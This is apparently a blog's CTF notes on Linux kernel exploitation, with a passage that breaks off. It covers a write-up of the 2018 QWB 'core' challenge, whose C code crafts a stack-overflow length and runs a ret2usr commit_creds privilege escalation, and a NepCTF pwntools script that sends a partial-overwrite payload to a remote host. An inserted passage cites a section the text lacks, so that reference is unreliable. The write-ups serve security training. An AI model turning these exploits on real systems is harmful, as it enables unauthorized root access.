<h2 id="内核提权"><a href="#内核提权" class="headerlink" title="Kernel privilege escalation"></a>Kernel privilege escalation</h2><h3 id="方式"><a href="#方式" class="headerlink" title="Methods"></a>Methods</h3><ol>
<li>Overwrite the current task's cred structure directly (uid/gid fields to 0), given an arbitrary write.</li>
<li>Call <code>commit_creds(prepare_kernel_cred(0))</code> from hijacked kernel execution. Caveat: since Linux 6.2 <code>prepare_kernel_cred(NULL)</code> no longer hands back root credentials (it requires a real task pointer), so on recent kernels the equivalent is <code>commit_creds(&init_cred)</code> with <code>init_cred</code> resolved from kallsyms.</li>
</ol>
<h3 id="cred结构体"><a href="#cred结构体" class="headerlink" title="The cred structure"></a>The cred structure</h3><p>Every process has a cred structure that records its credentials (uid, gid, capabilities and so on); whoever can write a process's cred has changed that process's privileges.</p>
<p>The <a href="https://code.woboq.org/linux/linux/include/linux/cred.h.html#cred">source</a> of struct cred:</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">cred</span> {</span></span><br><span class="line"> <span class="keyword">atomic_t</span> usage;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_DEBUG_CREDENTIALS</span></span><br><span class="line"> <span class="keyword">atomic_t</span> subscribers; <span class="comment">/* number of processes subscribed */</span></span><br><span class="line"> <span class="keyword">void</span> *put_addr;</span><br><span class="line"> <span class="keyword">unsigned</span> magic;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC 0x43736564</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> CRED_MAGIC_DEAD 0x44656144</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> <span class="keyword">kuid_t</span> uid; <span class="comment">/* real UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> gid; <span class="comment">/* real GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> suid; <span class="comment">/* saved UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> sgid; <span class="comment">/* saved GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> euid; <span class="comment">/* effective UID of the task */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> egid; <span class="comment">/* effective GID of the task */</span></span><br><span class="line"> <span class="keyword">kuid_t</span> fsuid; <span class="comment">/* UID for VFS ops */</span></span><br><span class="line"> <span class="keyword">kgid_t</span> fsgid; <span 
class="comment">/* GID for VFS ops */</span></span><br><span class="line"> <span class="keyword">unsigned</span> securebits; <span class="comment">/* SUID-less security management */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_inheritable; <span class="comment">/* caps our children can inherit */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_permitted; <span class="comment">/* caps we're permitted */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_effective; <span class="comment">/* caps we can actually use */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_bset; <span class="comment">/* capability bounding set */</span></span><br><span class="line"> <span class="keyword">kernel_cap_t</span> cap_ambient; <span class="comment">/* Ambient capability set */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_KEYS</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">char</span> jit_keyring; <span class="comment">/* default keyring to attach requested</span></span><br><span class="line"><span class="comment"> * keys to */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> __<span class="title">rcu</span> *<span class="title">session_keyring</span>;</span> <span class="comment">/* keyring inherited over fork */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">process_keyring</span>;</span> <span class="comment">/* keyring private to this process */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">thread_keyring</span>;</span> <span class="comment">/* keyring private to this 
thread */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">key</span> *<span class="title">request_key_auth</span>;</span> <span class="comment">/* assumed request_key authority */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_SECURITY</span></span><br><span class="line"> <span class="keyword">void</span> *security; <span class="comment">/* subjective LSM security */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">user_struct</span> *<span class="title">user</span>;</span> <span class="comment">/* real user ID subscription */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">user_namespace</span> *<span class="title">user_ns</span>;</span> <span class="comment">/* user_ns the caps and keyrings are relative to. */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">group_info</span> *<span class="title">group_info</span>;</span> <span class="comment">/* supplementary groups for euid/fsgid */</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">rcu_head</span> <span class="title">rcu</span>;</span> <span class="comment">/* RCU deletion hook */</span></span><br><span class="line">} __randomize_layout;</span><br></pre></td></tr></table></figure>
<h2 id="状态切换"><a href="#状态切换" class="headerlink" title="Context switches"></a>Context switches</h2><h3 id="user2kernel-user-space-to-kernel-space"><a href="#user2kernel-user-space-to-kernel-space" class="headerlink" title="user2kernel (user space to kernel space)"></a>user2kernel (user space to kernel space)</h3><p>A <code>system call</code>, an <code>exception</code>, or an <code>interrupt from a peripheral</code> switches the CPU from user mode to kernel mode:</p>
<ol>
<li><code>swapgs</code> exchanges the GS base register with the value kept in the IA32_KERNEL_GS_BASE MSR, so the user's GS base is preserved and the kernel's per-CPU base is installed for the rest of the entry path.</li>
<li>The current (user) stack pointer is saved in the per-CPU area and the kernel stack top recorded there is loaded into rsp.</li>
<li>The registers are pushed onto the kernel stack, forming a <code>struct pt_regs</code>.</li>
</ol>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"> ENTRY(entry_SYSCALL_64)</span><br><span class="line"> /* SWAPGS_UNSAFE_STACK is a macro; on x86 it expands to the swapgs instruction */</span><br><span class="line"> SWAPGS_UNSAFE_STACK</span><br><span class="line"></span><br><span class="line"> /* save the user stack pointer and switch to the kernel stack */</span><br><span class="line"> movq %rsp, PER_CPU_VAR(rsp_scratch)</span><br><span class="line"> movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/* push the registers to build a struct pt_regs on the stack */</span><br><span class="line">/* Construct struct pt_regs on stack */</span><br><span class="line">pushq $__USER_DS /* pt_regs->ss */</span><br><span class="line">pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */</span><br><span class="line">pushq %r11 /* pt_regs->flags */</span><br><span class="line">pushq $__USER_CS /* pt_regs->cs */</span><br><span class="line">pushq %rcx /* pt_regs->ip */</span><br><span class="line">pushq %rax /* pt_regs->orig_ax */</span><br><span class="line">pushq %rdi /* pt_regs->di */</span><br><span class="line">pushq %rsi /* pt_regs->si */</span><br><span class="line">pushq %rdx /* pt_regs->dx */</span><br><span class="line">pushq %rcx /* pt_regs->cx */</span><br><span class="line">pushq $-ENOSYS /* pt_regs->ax */</span><br><span class="line">pushq %r8 /* pt_regs->r8 */</span><br><span class="line">pushq %r9 /* pt_regs->r9 */</span><br><span class="line">pushq %r10 /* pt_regs->r10 */</span><br><span class="line">pushq %r11 /* pt_regs->r11 */</span><br><span class="line">sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */</span><br></pre></td></tr></table></figure>
<h3 id="kernel2user-kernel-space-to-user-space"><a href="#kernel2user-kernel-space-to-user-space" class="headerlink" title="kernel2user (kernel space to user space)"></a>kernel2user (kernel space to user space)</h3><ol>
<li><code>swapgs</code> restores the user GS base.</li>
<li><code>sysretq</code> or <code>iretq</code> returns to user space. <code>sysretq</code> takes rip from rcx and rflags from r11; <code>iretq</code> pops a frame from the stack instead, so an exploit that returns this way must push the user-space values itself, in the order ss, rsp, rflags, cs, rip (rip ends up lowest on the stack).</li>
</ol>
<h2 id="文件结构"><a href="#文件结构" class="headerlink" title="File layout"></a>File layout</h2><h3 id="boot-sh"><a href="#boot-sh" class="headerlink" title="boot.sh"></a>boot.sh</h3><p>A shell script that boots the kernel, almost always with qemu; which mitigations are active depends on the qemu command-line options.</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-system-x86_64 \ <span class="comment">#start qemu</span></span><br><span class="line">-m 64M \ <span class="comment">#guest RAM size (default 128M)</span></span><br><span class="line">-kernel ./bzImage \ <span class="comment">#kernel image</span></span><br><span class="line">-initrd ./core.cpio \ <span class="comment">#initial ramdisk holding the file system</span></span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \ <span class="comment">#kernel command line: console on the serial port, RAM disk as root, kaslr enabled; oops=panic panic=1 turns any oops into a reboot</span></span><br><span class="line">-s \ <span class="comment">#gdb stub on tcp::1234</span></span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \ <span class="comment">#user-mode networking</span></span><br><span class="line">-nographic \ <span class="comment">#no graphical console</span></span><br></pre></td></tr></table></figure>
<p>Related options:</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">-append    extra kernel command-line options; nokaslr disables the random base</span><br><span class="line">-nographic together with console=ttyS0 puts the guest console on the current terminal</span><br><span class="line"></span><br><span class="line">-s         shorthand for -gdb tcp::1234; gdb on the host attaches with target remote :1234</span><br><span class="line"></span><br><span class="line">-monitor   redirects the qemu monitor <span class="comment">#-monitor /dev/null sends it to /dev/null so a guest user cannot drop into it</span></span><br><span class="line"></span><br><span class="line">-smp       number of virtual CPUs, i.e. sockets cores threads = maxcpus.</span><br><span class="line"></span><br><span class="line">-cpu       CPU model and feature flags</span><br><span class="line"><span class="comment">#-cpu kvm64,+smep,+smap for example enables smep and smap in the guest</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="bzImage"><a href="#bzImage" class="headerlink" title="bzImage"></a>bzImage</h3><p>The compressed, bootable Linux kernel image (what qemu's -kernel loads).</p>
<h3 id="vmlinux"><a href="#vmlinux" class="headerlink" title="vmlinux"></a>vmlinux</h3><p>The uncompressed kernel, a plain ELF file straight out of the build. It is what you load into gdb or IDA and what System.map is generated from; it cannot be booted directly and is only an intermediate product on the way to bzImage. When a challenge does not ship it, the kernel's own scripts/extract-vmlinux can recover it from bzImage.</p>
<h3 id="cpio"><a href="#cpio" class="headerlink" title="*.cpio"></a>*.cpio</h3><p>The packed root file system (initramfs).</p>
<h3 id="ko"><a href="#ko" class="headerlink" title="*.ko"></a>*.ko</h3><p>The kernel module containing the vulnerability; it is loaded by init.</p>
<h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p>The script the kernel runs as its first process: it mounts /proc and /sys, creates the device nodes, loads the vulnerable module and drops into a shell.</p>
<h1 id="启动之前"><a href="#启动之前" class="headerlink" title="Before booting"></a>Before booting</h1><h2 id="解包"><a href="#解包" class="headerlink" title="Unpacking"></a>Unpacking</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mkdir core</span><br><span class="line">mv core.cpio ./core/core.cpio</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">cpio -idmv < core.cpio <span class="comment">#unpack</span></span><br></pre></td></tr></table></figure>
<p>If the archive is gzip-compressed (check with <code>file core.cpio</code>), decompress it first:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mv core.cpio ./core/core.cpio.gz</span><br><span class="line"><span class="built_in">cd</span> core</span><br><span class="line">gunzip core.cpio.gz <span class="comment"># not every challenge needs this step</span></span><br></pre></td></tr></table></figure>
<h2 id="打包"><a href="#打包" class="headerlink" title="Repacking"></a>Repacking</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ rm -rf core.cpio</span><br><span class="line">$ vi init <span class="comment">#edit the init script</span></span><br><span class="line">$ find . | cpio -o --format=newc > ../rootfs.img<span class="comment">#repack</span></span><br></pre></td></tr></table></figure>
<p>The kernel expects the newc format, and the repacked file has to be the one the boot script's <code>-initrd</code> points at (core.cpio in this challenge), so either rename the output or adjust the script.</p>
<h1 id="2018强网杯-core"><a href="#2018强网杯-core" class="headerlink" title="2018强网杯 core"></a>2018强网杯 core</h1><h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: No RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: No PIE (0x0)</span><br></pre></td></tr></table></figure>
<p>Canary is enabled.</p>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="Challenge analysis"></a>Challenge analysis</h2><h3 id="start-sh"><a href="#start-sh" class="headerlink" title="start.sh"></a>start.sh</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 64M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd ./core.cpio \</span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \</span><br><span class="line">-s \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic \</span><br></pre></td></tr></table></figure>
<p>kaslr is on; SMAP and SMEP are not (no <code>-cpu</code> flags enable them), so the kernel may be returned into code that lives in user space.</p>
<h3 id="init-1"><a href="#init-1" class="headerlink" title="init"></a>init</h3><p>The init script from the unpacked file system. Three lines matter for exploitation: <code>cat /proc/kallsyms > /tmp/kallsyms</code> runs before kptr_restrict is set to 1, so the unprivileged shell can still read real kernel addresses (commit_creds, prepare_kernel_cred and the KASLR base) from /tmp/kallsyms; <code>setuidgid 1000</code> starts the shell without privileges, which is what has to be escalated; and <code>poweroff -d 120</code> shuts the guest down after two minutes, so the exploit has to be compiled, transferred and run within that window.</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">mount -t proc proc /proc</span><br><span class="line">mount -t sysfs sysfs /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">/sbin/mdev -s</span><br><span class="line">mkdir -p /dev/pts</span><br><span class="line">mount -vt devpts -o gid=4,mode=620 none /dev/pts</span><br><span class="line">chmod 666 /dev/ptmx</span><br><span class="line">cat /proc/kallsyms > /tmp/kallsyms</span><br><span class="line"><span class="built_in">echo</span> 1 > /proc/sys/kernel/kptr_restrict</span><br><span class="line"><span class="built_in">echo</span> 1 > /proc/sys/kernel/dmesg_restrict</span><br><span class="line">ifconfig eth0 up</span><br><span class="line">udhcpc -i eth0</span><br><span class="line">ifconfig eth0 10.0.2.15 netmask 255.255.255.0</span><br><span class="line">route add default gw 10.0.2.2 </span><br><span class="line">insmod /core.ko</span><br><span class="line"></span><br><span class="line">poweroff -d 120 -f &</span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br><span class="line"><span class="built_in">echo</span> <span class="string">'sh end!\n'</span></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line"></span><br><span class="line">poweroff -d 0 -f</span><br></pre></td></tr></table></figure>
<h3 id="有vmlinux"><a href="#有vmlinux" class="headerlink" title="vmlinux is provided"></a>vmlinux is provided</h3><h2 id="IDA分析core-ko"><a href="#IDA分析core-ko" class="headerlink" title="Analysing core.ko in IDA"></a>Analysing core.ko in IDA</h2><h3 id="init-module"><a href="#init-module" class="headerlink" title="init_module"></a>init_module</h3><p>Creates a proc entry; user space talks to the module by opening that file and issuing read, write and ioctl on it.</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132302377.png" alt="image-20220404132302377"></p>
<h3 id="core-ioctl"><a href="#core-ioctl" class="headerlink" title="core_ioctl"></a>core_ioctl</h3><p>The handler entered on ioctl; it dispatches on the command number, so it plays the role of a main function for the module.</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132237103.png" alt="image-20220404132237103"></p>
<h3 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h3><p><code>copy_to_user()</code> copies 64 bytes from a stack address plus the global <code>off</code> into the user buffer a1. Because <code>off</code> is under the user's control, it can be pointed at the saved canary and at a return address in the same frame, leaking both the canary and a kernel text address (which gives the KASLR slide).</p>
<p>The canary sits at rsp+0x40 in this frame.</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132341618.png" alt="image-20220404132341618"></p>
<h3 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h3><p><code>copy_from_user()</code> copies user data into the kernel and stores it in the global buffer <code>name</code>.</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132400697.png" alt="image-20220404132400697"></p>
<h3 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h3><p>Copies data from the global <code>name</code> into the local stack buffer v2. The length a1 is user-controlled and the check <code>a1 > 63</code> is meant to bound it, but the comparison treats a1 as a signed __int64 while <code>qmemcpy()</code> receives it as an unsigned __int16. A negative a1 therefore passes the check and its low 16 bits become the copy length: 0xffffffffffff0100, for instance, is negative for the check and 0x100 for the copy, which overflows the 64-byte stack buffer.</p>
<p><img src="/article/Linux%20Kernel%200x1/image-20220404132526370.png" alt="image-20220404132526370"></p>
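<p>The signedness mismatch described above, as an added example (this is not the challenge's code): a user-space model of the check and the truncation, with a helper that crafts the length an exploit would pass. The only layout assumption is the 64-byte stack buffer implied by the <code>a1 > 63</code> check; nothing else about the module is assumed.</p>

```c
/* Added example for this write-up, not code from the challenge. It models the
 * length handling the decompilation of core_copy_func shows: the user-supplied
 * length is compared as a signed 64-bit value (a1 > 63 rejects) but handed to the
 * copy as an unsigned 16-bit value. The 64-byte buffer size is what the check
 * implies; nothing else about the module's stack layout is assumed. */
#include <stdint.h>
#include <stdio.h>

#define STACK_BUF_SIZE 64   /* assumed from the a1 > 63 check */

/* Length the copy actually receives, or -1 if the check rejects a1. */
long effective_copy_len(int64_t a1)
{
    if (a1 > 63)            /* signed compare: every negative value passes */
        return -1;
    return (uint16_t)a1;    /* the copy only ever sees the low 16 bits */
}

/* Craft the argument an exploit passes: negative as int64, low 16 bits == want. */
int64_t craft_length(uint16_t want)
{
    return (int64_t)(0xffffffffffff0000ULL | want);
}

/* Bytes written past the end of the stack buffer for a given a1
 * (0 if the copy stays inside it, -1 if the request is rejected). */
long overflow_bytes(int64_t a1)
{
    long len = effective_copy_len(a1);
    if (len < 0)
        return -1;
    return len > STACK_BUF_SIZE ? len - STACK_BUF_SIZE : 0;
}

int main(void)
{
    /* constructed probes: a legal length, the first rejected one, -1, and two crafted values */
    int64_t probes[] = { 63, 64, -1, craft_length(0x100), craft_length(0x40) };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("a1=%#llx  check=%s  copy_len=%ld  overflow=%ld\n",
               (unsigned long long)probes[i],
               probes[i] > 63 ? "rejected" : "passed",
               effective_copy_len(probes[i]), overflow_bytes(probes[i]));
    return 0;
}
```

The crafted value has to satisfy both views at once: the high bits make it negative so the signed check passes, and only the low 16 bits decide how much of <code>name</code> lands on the stack, so the payload written through core_write must be at least that long.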
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="Exploitation plan"></a>Exploitation plan</h2><ol>
<li>Set <code>off</code> through the ioctl interface.</li>
<li>Call core_read to leak the canary (and a kernel address) from the stack.</li>
<li>Call write to place the payload (padding, canary, then the hijacked return) into the global <code>name</code>.</li>
<li>Call core_copy_func with a negative length so that the truncated 16-bit copy overflows the stack.</li>
</ol>
<h2 id="提权"><a href="#提权" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p>With control flow hijacked, a user-space pwn just spawns a shell; in the kernel more care is needed, because the hijacked code runs in ring 0 and has to hand the CPU back to user space without crashing the system.</p>
<p>The hijacked control flow runs with kernel privileges, so it can grant itself root.</p>
<p><code>commit_creds(prepare_kernel_cred(0));</code></p>
<p><code>prepare_kernel_cred(0)</code> allocates a fresh cred structure with uid/gid 0 and full capabilities, and <code>commit_creds</code> installs it as the current task's credentials. Because SMEP is off here, the function that makes these two calls can live in the exploit's own user-space memory (ret2usr); its targets are taken from /tmp/kallsyms, which already holds the runtime (randomized) addresses, so no rebasing is needed.</p>
<p>Afterwards the code returns to user space with <code>swapgs; iretq</code>, having pushed ss, rsp, rflags, cs and the address of a function that runs <code>"/bin/sh"</code>; that shell is root.</p>
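<p>As an added example that is not the author's exploit, the two pieces this plan needs around the overflow itself: resolving commit_creds and prepare_kernel_cred from the /tmp/kallsyms copy that init leaves behind (treating all-zero addresses, the kptr_restrict=1 failure mode from the Kernel Address Display Restriction section, as "no leak"), and the user-space get_root/iretq landing code described under kernel2user. The kallsyms text and the addresses in it are constructed for illustration; the stack layout of the overflow is not given on this page and is not reproduced.</p>

```c
/* Added example for this write-up, not the challenge's exploit. Assumed: the
 * constructed kallsyms text below (illustrative addresses) and the /tmp/kallsyms
 * copy that this challenge's init leaves readable. The ret2usr part only does
 * something useful inside the guest, after the core_copy_func overflow has
 * redirected execution to get_root(); here it is compiled but never called. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef unsigned long u64;

/* One kallsyms line is "address type name". Returns 1 if it names `name`. */
int parse_kallsyms_line(const char *line, const char *name, u64 *addr)
{
    unsigned long long a; char type, sym[128];
    if (sscanf(line, "%llx %c %127s", &a, &type, sym) != 3 || strcmp(sym, name))
        return 0;
    *addr = (u64)a;
    return 1;
}

/* Resolve `name` from kallsyms text. Returns 0 when absent or when the address is
 * masked to zero, which is what an unprivileged read gives under kptr_restrict=1;
 * the caller must treat 0 as "no leak", never as a real address. */
u64 resolve_symbol(const char *text, const char *name)
{
    char line[256]; u64 a;
    while (*text) {
        size_t n = strcspn(text, "\n");
        if (n >= sizeof line) n = sizeof line - 1;
        memcpy(line, text, n); line[n] = '\0';
        if (parse_kallsyms_line(line, name, &a)) return a;
        text += n + (text[n] == '\n');
    }
    return 0;
}

/* Same, reading a file such as /tmp/kallsyms on the target. */
u64 resolve_symbol_file(const char *path, const char *name)
{
    char line[256]; u64 a = 0;
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    while (fgets(line, sizeof line, f))
        if (parse_kallsyms_line(line, name, &a)) break;
    fclose(f);
    return a;
}

/* KASLR slide = leaked runtime address - address of the same symbol in vmlinux. */
u64 kaslr_slide(u64 runtime, u64 vmlinux) { return runtime - vmlinux; }

/* Constructed sample input: an unrestricted copy, and the masked form an
 * unprivileged user sees from /proc/kallsyms once kptr_restrict=1. */
static const char SAMPLE_KALLSYMS[] =
    "ffffffff81000000 T _text\n"
    "ffffffff8109c8e0 T prepare_kernel_cred\n"
    "ffffffff8109cce0 T commit_creds\n";
static const char MASKED_KALLSYMS[] =
    "0000000000000000 T prepare_kernel_cred\n"
    "0000000000000000 T commit_creds\n";

u64 commit_creds_addr, prepare_kernel_cred_addr;
u64 user_cs, user_ss, user_rflags, user_sp;

#if defined(__x86_64__)
/* Record the ring-3 context that iretq must restore later. */
void save_status(void)
{
    __asm__ volatile("mov %%cs, %0\n mov %%ss, %1\n mov %%rsp, %2\n pushfq\n popq %3\n"
                     : "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
                     : : "memory");
}

void get_shell(void) { system("/bin/sh"); }

/* Runs in ring 0 once the overflow returns here (possible because SMEP is off):
 * commit_creds(prepare_kernel_cred(0)), then swapgs; iretq with the frame
 * ss, rsp, rflags, cs, rip back into get_shell(). On kernels >= 6.2
 * prepare_kernel_cred(0) no longer yields root; use commit_creds(&init_cred). */
void get_root(void)
{
    void *(*prepare_kernel_cred)(void *) = (void *(*)(void *))prepare_kernel_cred_addr;
    int (*commit_creds)(void *) = (int (*)(void *))commit_creds_addr;
    commit_creds(prepare_kernel_cred(0));
    __asm__ volatile("swapgs\n pushq %0\n pushq %1\n pushq %2\n pushq %3\n pushq %4\n iretq\n"
                     : : "r"(user_ss), "r"(user_sp), "r"(user_rflags), "r"(user_cs),
                       "r"((u64)get_shell) : "memory");
}
#endif

int main(void)
{
    const char *path = "/tmp/kallsyms";   /* written by init before kptr_restrict=1 */
    commit_creds_addr = resolve_symbol_file(path, "commit_creds");
    prepare_kernel_cred_addr = resolve_symbol_file(path, "prepare_kernel_cred");
    if (!commit_creds_addr) {             /* not inside the guest: fall back to the sample */
        commit_creds_addr = resolve_symbol(SAMPLE_KALLSYMS, "commit_creds");
        prepare_kernel_cred_addr = resolve_symbol(SAMPLE_KALLSYMS, "prepare_kernel_cred");
    }
    printf("commit_creds=%#lx prepare_kernel_cred=%#lx slide=%#lx\n",
           commit_creds_addr, prepare_kernel_cred_addr,
           kaslr_slide(resolve_symbol(SAMPLE_KALLSYMS, "_text"), 0xffffffff81000000UL));
    printf("masked read gives %#lx -> unusable\n", resolve_symbol(MASKED_KALLSYMS, "commit_creds"));
#if defined(__x86_64__)
    save_status();   /* a real exploit would now do steps 1-4 of the plan and land in get_root */
    (void)get_root;
#endif
    return 0;
}
```

Inside the guest the program reads the real addresses from /tmp/kallsyms; outside it, the constructed text stands in so the resolver and slide computation can be exercised. The all-zero case is deliberately reported as 0 rather than used, because a payload that returns into address 0 is the typical symptom of forgetting that kptr_restrict masked the leak.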
<p>References:</p>
<p><a href="https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0">https://bbs.pediy.com/thread-262425.htm#msg_header_h2_0</a></p>
<p><a href="https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred">https://ctf-wiki.org/pwn/linux/kernel-mode/basic-knowledge/#struct-cred</a></p>
<p><a href="https://bbs.pediy.com/thread-259386.htm">https://bbs.pediy.com/thread-259386.htm</a></p>
<p><a href="http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/">http://eeeeeeeeeeeeeeeea.cn/2021/11/13/kernel-pwn-%E4%BA%8C/</a></p>
<p><a href="https://blog.csdn.net/weixin_35182419/article/details/111951986">https://blog.csdn.net/weixin_35182419/article/details/111951986</a></p>
]]></content>
<categories>
<category>Notes</category>
</categories>
</entry>
<entry>
<title>NepCTF</title>
<url>/article/NepCTF/</url>
<content><![CDATA[<h1 id="NepCTF"><a href="#NepCTF" class="headerlink" title="NepCTF"></a>NepCTF</h1><span id="more"></span>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="xhh"><a href="#xhh" class="headerlink" title="xhh"></a>xhh</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210322132920.png" alt="20210322132920"></p>
<p>A stack overflow: 0x10 bytes of padding reach the saved return address, and the target is the function that runs system("cat flag"). Its low byte does not change under address randomization (the low 12 bits of a PIE address are fixed), so only that byte is overwritten, least significant first; when the picture printed by the service refreshes to the little tadpole pattern, the shell is there.</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.arch = 'amd64'</span><br><span class="line">context.log_level='debug'</span><br><span class="line">#p = process('./xhh')</span><br><span class="line">p = remote('node2.hackingfor.fun',35402 )</span><br><span class="line">#p = remote('127.0.0.1',12345)</span><br><span class="line"># 0x10 bytes of padding, then a one-byte partial overwrite of the saved return address:</span><br><span class="line"># the low 12 bits of a PIE address are not randomized, so 0xE1 reaches the</span><br><span class="line"># system("cat flag") function without any leak</span><br><span class="line">payload = p64(0) + p64(1) + b"\xE1"</span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Re"><a href="#Re" class="headerlink" title="Re"></a>Re</h1><h2 id="hardcsharp"><a href="#hardcsharp" class="headerlink" title="hardcsharp"></a>hardcsharp</h2><figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Main</span>(<span class="params"><span class="built_in">string</span>[] args</span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> AesClass class2 = <span class="keyword">new</span> AesClass();</span><br><span class="line"> <span class="built_in">string</span> key = <span class="string">""</span>;</span><br><span class="line"> <span class="built_in">string</span> strB = <span class="string">"1Umgm5LG6lNPyRCd0LktJhJtyBN7ivpq+EKGmTAcXUM+0ikYZL4h4QTHGqH/3Wh0"</span>;</span><br><span class="line"> <span class="built_in">byte</span>[] buffer = <span class="keyword">new</span> <span class="built_in">byte</span>[] { </span><br><span class="line"> <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x44</span>, <span class="number">0x5c</span>, <span class="number">0x5e</span>, <span class="number">0x56</span>, <span class="number">0x5d</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>,</span><br><span class="line"> <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span 
